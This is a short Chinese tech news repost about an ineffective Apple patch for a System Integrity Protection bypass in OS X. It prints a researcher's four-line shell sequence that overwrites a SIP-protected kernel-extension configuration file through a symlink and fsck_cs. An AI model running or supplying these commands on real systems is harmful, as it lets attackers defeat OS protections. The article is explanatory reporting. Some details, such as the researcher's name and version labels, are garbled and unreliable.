苹果最新发布的 OS X 10.11.4 和 iOS 9.3 更新中,一个权限提升的漏洞补丁是无效的,导致1.3亿苹果用户面临黑客攻击的危险。
这个权限提升漏洞是上周曝出的,存在于苹果流行的“系统完整性保护”(SIP)安全机制中,影响所有版本的 OS X 操作系统。事后苹果紧急发布补丁,补上了大部分系统中的漏洞,但在上述两种系统中SIP还是可以被绕过,并被用来远程劫持用户的设备。
德国的一位安全研究者,Stefano Esser,于3月28日在推特上发布了一段只有几十个字符的漏洞利用代码。这段代码可以修改 OS X 中一个连root用户都不允许修改的关键配置文件。
这段代码实际上可以扩展为:
ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX
fsck_cs /dev/diskX 1>&-
touch /Library/Extensions/
Reboot
上面这段代码可以成功绕过苹果的SIP安全机制,允许攻击者运行任意进程。
SIP原本是 OS X 内核的保护功能,在OS X EI Captian(即10.11.4)版本中,甚至限制了root权限的用户执行被SIP保护的程序。除此之外,SIP还可以防止系统启动项被篡改,阻断某种被加载的内核扩展以及限制某些应用的debug调试。SIP默认保护/System,/usr,/bin,/sbin等文件夹,和在 OS X 上预装的应用程序。
现在,我们只能寄希望于苹果下一次发布的补丁有效吧。
本文转自d1net(转载)
时间: 2024-09-20 21:57:53